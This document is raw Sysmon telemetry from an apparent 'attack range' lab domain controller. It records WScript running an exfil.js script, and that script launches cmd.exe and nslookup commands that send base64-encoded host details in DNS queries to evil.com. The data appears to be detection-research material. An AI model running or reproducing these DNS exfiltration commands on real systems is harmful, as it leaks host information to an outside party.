14:16:04.396{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.396{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-913D-000000005F02}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.396{2E1864BB-17A1-629A-783D-000000005F02}55526492C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-913D-000000005F02}4904C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.395{2E1864BB-17A4-629A-913D-000000005F02}4904C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmkog.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.391{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxfzsw.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-17A4-629A-8F3D-000000005F02}37245408C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-903D-000000005F02}7192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043904Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:04.136{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-903D-000000005F02}7192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-17A4-629A-8E3D-000000005F02}40603776C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-903D-000000005F02}7192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.342{2E1864BB-17A4-629A-903D-000000005F02}7192C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-8E3D-000000005F02}4060C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxfzsw.tmp 2>&1 10341000x8000000000000000193943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.311{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-8F3D-000000005F02}3724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.311{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-8F3D-000000005F02}3724C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.295{2E1864BB-17A4-629A-8F3D-000000005F02}37245408C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-8E3D-000000005F02}4060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.295{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-8F3D-000000005F02}3724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.271{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-8E3D-000000005F02}4060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.287{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.287{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.271{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.271{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.271{2E1864BB-17A1-629A-783D-000000005F02}55524136C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-8E3D-000000005F02}4060C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.286{2E1864BB-17A4-629A-8E3D-000000005F02}4060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxfzsw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.271{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpkqfk.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.256{2E1864BB-17A4-629A-8C3D-000000005F02}60207156C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-8D3D-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.256{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.256{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.256{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-8D3D-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.256{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.256{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 